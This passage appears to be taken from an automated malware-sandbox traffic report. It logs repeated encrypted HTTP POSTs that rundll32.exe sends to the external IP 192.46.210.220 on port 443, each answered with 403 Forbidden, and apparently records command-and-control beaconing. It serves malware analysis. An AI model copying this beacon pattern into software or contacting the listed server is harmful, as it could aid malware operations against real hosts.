Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:49 UTC | 283 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:48 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
56 | 192.168.2.5 | 50004 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:48 UTC | 278 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:49 UTC | 283 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:48 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
57 | 192.168.2.5 | 50012 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:52 UTC | 283 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:52 UTC | 293 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:52 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 58 | Source IP: 192.168.2.5 | Source Port: 50011 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:52 UTC | 288 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:52 UTC | 288 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:52:52 UTC | 293 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:52 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 59 | Source IP: 192.168.2.5 | Source Port: 50019 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:55 UTC | 293 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:55 UTC | 293 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:52:56 UTC | 302 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:56 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49774 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:51:09 UTC | 29 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:51:09 UTC | 29 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:51:10 UTC | 34 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:51:10 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 60 | Source IP: 192.168.2.5 | Source Port: 50020 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:56 UTC | 298 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:56 UTC | 298 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:52:56 UTC | 303 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:56 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 61 | Source IP: 192.168.2.5 | Source Port: 50027 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:59 UTC | 303 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:59 UTC | 303 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:53:00 UTC | 312 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:53:00 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 62 | Source IP: 192.168.2.5 | Source Port: 50028 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:59 UTC | 308 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:59 UTC | 308 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:53:00 UTC | 313 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:53:00 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 63 | Source IP: 192.168.2.5 | Source Port: 50035 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:03 UTC | 313 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:53:03 UTC | 313 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:53:04 UTC | 322 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:53:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 64 | Source IP: 192.168.2.5 | Source Port: 50036 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:04 UTC | 318 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:53:04 UTC | 318 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:53:04 UTC | 323 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:53:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 65 | Source IP: 192.168.2.5 | Source Port: 50043 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:07 UTC | 323 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:53:07 UTC | 323 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:53:08 UTC | 332 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:53:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 66 | Source IP: 192.168.2.5 | Source Port: 50044 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:08 UTC | 328 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:53:08 UTC | 328 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:53:08 UTC | 332 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:53:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 67 | Source IP: 192.168.2.5 | Source Port: 50054 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:11 UTC | 333 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:53:11 UTC | 333 | OUT | Data Raw: (hex and ASCII dump of the POST body omitted)
2021-10-28 02:53:12 UTC | 342 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:12 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 68 | Source IP: 192.168.2.5 | Source Port: 50055 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:12 UTC | 337 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4832
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:53:13 UTC | 342 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:13 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 69 | Source IP: 192.168.2.5 | Source Port: 50065 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:15 UTC | 343 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4844
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:53:16 UTC | 352 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:16 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49781 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:51:13 UTC | 34 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4832
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:51:14 UTC | 44 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:51:13 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 70 | Source IP: 192.168.2.5 | Source Port: 50066 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:16 UTC | 347 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4832
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:53:17 UTC | 352 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:16 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 71 | Source IP: 192.168.2.5 | Source Port: 50075 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:19 UTC | 352 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4844
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:53:20 UTC | 357 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:20 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 72 | Source IP: 192.168.2.5 | Source Port: 50079 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:21 UTC | 357 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4832
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:53:22 UTC | 362 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:21 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 73 | Source IP: 192.168.2.5 | Source Port: 50083 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:23 UTC | 362 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4844
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:53:24 UTC | 367 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:24 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 74 | Source IP: 192.168.2.5 | Source Port: 50087 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:25 UTC | 367 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4832
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:53:25 UTC | 372 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:25 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 75 | Source IP: 192.168.2.5 | Source Port: 50091 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:27 UTC | 372 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4844
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:53:28 UTC | 377 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:28 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 76 | Source IP: 192.168.2.5 | Source Port: 50095 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:29 UTC | 377 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4832
  Connection: Close
  Cache-Control: no-cache
2021-10-28 02:53:29 UTC | 382 | IN | HTTP/1.1 403 Forbidden
  Server: nginx/1.15.12
  Date: Thu, 28 Oct 2021 02:53:29 GMT
  Content-Type: text/plain; charset=utf-8
  Connection: close


Session ID: 77 | Source IP: 192.168.2.5 | Source Port: 50099 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:53:31 UTC | 382 | OUT | POST / HTTP/1.1
  Host: 192.46.210.220
  Content-Length: 4844
  Connection: Close
  Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:32 UTC387INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:31 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
78         | 192.168.2.5 | 50103       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:53:32 UTC | 387                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4832
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:53:32 UTC | 387                | OUT       | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:53:33 UTC | 392                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:53:33 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
79         | 192.168.2.5 | 50107       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:53:35 UTC | 392                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:53:35 UTC | 392                | OUT       | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:53:35 UTC | 397                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:53:35 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
8          | 192.168.2.5 | 49782       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:51:13 UTC | 39                 | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:51:13 UTC | 39                 | OUT       | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:14 UTC | 44                 | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:51:14 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
80         | 192.168.2.5 | 50111       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:53:36 UTC | 397                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4832
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:53:36 UTC | 397                | OUT       | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:53:37 UTC | 402                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:53:37 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
81         | 192.168.2.5 | 50116       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:53:39 UTC | 402                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:53:39 UTC | 402                | OUT       | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:53:39 UTC | 407                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:53:39 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
82         | 192.168.2.5 | 50119       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:53:40 UTC | 407                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4832
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:53:40 UTC | 407                | OUT       | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                        |                    |           | Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:53:41 UTC | 412                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:53:41 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
83         | 192.168.2.5 | 50123       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:53:42 UTC | 412                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
